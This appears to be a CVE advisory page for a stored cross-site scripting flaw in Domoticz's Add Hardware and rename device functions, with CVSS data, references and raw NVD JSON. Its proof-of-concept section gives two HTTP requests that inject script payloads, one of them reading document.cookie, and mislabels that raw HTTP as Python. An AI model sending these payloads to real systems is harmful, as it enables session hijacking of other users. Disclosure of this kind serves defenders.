CVE-2026-1001

Description

Domoticz versions prior to 2026.1 contain a stored cross-site scripting vulnerability in the Add Hardware and rename device functionality of the web interface that allows authenticated administrators to execute arbitrary scripts by supplying crafted names containing script or HTML markup. Attackers can inject malicious code that is stored and rendered without proper output encoding, causing script execution in the browsers of users viewing the affected page and enabling unauthorized actions within their session context.

CVSS Details

CVSS Score

4.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:domoticz:domoticz:*:*:*:*:*:*:*:* - VULNERABLE

Domoticz < 2026.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC for CVE-2026-1001: Domoticz Stored XSS via Hardware/Device Name
 * Description: Inject a malicious script into the hardware name field.
 */

POST /hardware/create HTTP/1.1
Host: target-domoticz-host
Content-Type: application/x-www-form-urlencoded
Cookie: sessionid=ADMIN_SESSION_COOKIE

hardwarename=<img src=x onerror=alert('XSS')>&hardwaretype=13&enabled=true

/*
 * Alternatively, renaming a device:
 */

POST /rename_device HTTP/1.1
Host: target-domoticz-host
Content-Type: application/x-www-form-urlencoded
Cookie: sessionid=ADMIN_SESSION_COOKIE

idx=DEVICE_ID&name=<script>alert(document.cookie)</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1001
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1001
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1001/
[4] VulDB https://vuldb.com/cve/CVE-2026-1001
[5] https://www.domoticz.com/2026.1/
[6] https://www.vulncheck.com/advisories/domoticz-stored-xss-via-hardware-configuration-endpoint

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1001", "sourceIdentifier": "[email protected]", "published": "2026-03-25T19:16:30.207", "lastModified": "2026-04-01T15:42:23.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Domoticz versions prior to 2026.1 contain a stored cross-site scripting vulnerability in the Add Hardware and rename device functionality of the web interface that allows authenticated administrators to execute arbitrary scripts by supplying crafted names containing script or HTML markup. Attackers can inject malicious code that is stored and rendered without proper output encoding, causing script execution in the browsers of users viewing the affected page and enabling unauthorized actions within their session context."}, {"lang": "es", "value": "Las versiones de Domoticz anteriores a 2026.1 contienen una vulnerabilidad de cross-site scripting almacenado en la funcionalidad Add Hardware y rename device de la interfaz web que permite a los administradores autenticados ejecutar scripts arbitrarios al proporcionar nombres manipulados que contienen scripts o marcado HTML. Los atacantes pueden inyectar código malicioso que se almacena y se renderiza sin una codificación de salida adecuada, provocando la ejecución de scripts en los navegadores de los usuarios que visualizan la página afectada y permitiendo acciones no autorizadas dentro del contexto de su sesión."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:domoticz:domoticz:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026.1", "matchCriteriaId": "F48762BB-8D65-422C-A9C5-0B4F4EB9121C"}]}]}], "references": [{"url": "https://www.domoticz.com/2026.1/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/domoticz-stored-xss-via-hardware-configuration-endpoint", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}